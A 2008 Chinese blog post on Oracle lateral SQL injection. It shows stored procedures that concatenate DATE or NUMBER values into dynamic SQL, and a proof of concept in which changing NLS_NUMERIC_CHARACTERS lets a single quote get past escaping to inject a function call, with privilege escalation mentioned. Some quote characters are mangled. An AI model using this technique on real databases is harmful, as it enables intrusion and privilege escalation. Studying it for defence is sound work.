ORACLE LATERAL-SQL-INJECTION 个人见解

更新时间：2008年05月07日 18:54:31   作者：

最近忙啊忙啊的，今天终于有点点时间抽出来看看技术文章了，最近国外又出了关于新型ORA注入技术的PAPER，赶紧测试，主要是出现在SQL语句字符拼 接的时候，DATE类型转换为VARCHAR 以及 NUMBER转换为VARCHAR加入的格式字符出现问题。

如果直接执行SQL语句或者参数绑定则不用担心太多，

如以下ORACLE存储过程

create or replace procedure kjdatepoc(date d)

as

begin

insert into kjdatetable values(d);

commit;

end;

根本不需要担心遭受到SQL新型注入攻击，那么在什么地方会发生DATE 以及 NUMBER的注入攻击呢！？一般都是采用了动态SQL而又不采用参数绑定的语句。

例如工程师经常用的DBMS_SQL或者EXECUTE IMMEDIATE

看以下存储过程

create or replace procedure kjdatepoc(date d)

as

begin

execute immediate ‘insert into kjdatetable values('|| d ||')';

commit;

end;

那么遇到以上的存储过程或者函数等，也通过修改SESSION中的NLS_DATE_FORMAT中的值达到SQL注射的目的，

老外的PAPER讲解得非常详细了 ，我在这里也不废话。

惟独对于 NUMBER类型的注射没有多作讲解 只是简单演示了可以输出单引号！

看以下语句

ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';

SELECT to_number(1000.10001,'999999D99999′)||” FROM DUAL;

输出一下结果

1000′10001

只是多了一个单引号，那有什么用呢？乐观的来说！在特定情况下是很有价值的！看以下一个存储过程

create or replace procedure NumInjPoc(kjexpnum number,kjexpstr varchar2)

is

SecStr varchar2(1000);

begin

SecStr:=replace(kjexpstr,””,”””);

sys.dbms_output.put_line('SELECT * FROM DUAL WHERE ID='||kjexpnum||' and name=”'||SecStr||””);

end;

内部对varchar类型进行替换了！我们可以进行测试

begin

numinjpoc(1000,”'–');

end;

其输出SQL语句为

SELECT * FROM DUAL WHERE ID=1000 and name=”'–'

单引号被转义掉了

那么如果我们结合这个NUMBER类型怎么进行注射呢？

ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';

begin

numinjpoc(TO_NUMBER(0.10001,'999999D99999′),'||kj.exp()–');

end;

看看输出结果

SELECT * FROM DUAL WHERE ID='10001 and name='||kj.exp()–'

这样就可以间接的攻击它…

在某中程度才来需要ALTER SESSION 配合后，再去攻击系统内部的一些函数或者过程来提升权限。未尝不是一种好的突破思路，但是对于单语句进行SQL注射攻击，以结果为向导的话！这样的方式没多大作为。

相关文章

查看Oracle的执行计划一句话命令...2007-04-04

最近忙啊忙啊的，今天终于有点点时间抽出来看看技术文章了，最近国外又出了关于新型ORA注入技术的PAPER，赶紧测试，主要是出现在SQL语句字符拼 接的时候，DATE类型转换为VARCHAR 以及 NUMBER转换为VARCHAR加入的格式字符出现问题。2008-05-05

介绍Oracle数据库中获取数据的存储过程示例 ,在表A取得的数据插入另一个表B中2008-09-09

字符串函数，数学函数，日期函数，逻辑运算函数，其他函数2008-09-09

oracle下加密存储过程的方法...2007-04-04

Oracle 下的开发日积月累...2007-04-04

DBA_2PC_PENDING 介绍...2007-04-04

Oracle 下医嘱执行函数...2007-04-04

Unable to construct a Datum from the specified input的解决方法2008-09-09

DB2和 Oracle的并发控制(锁)的比较...2007-04-04

最新评论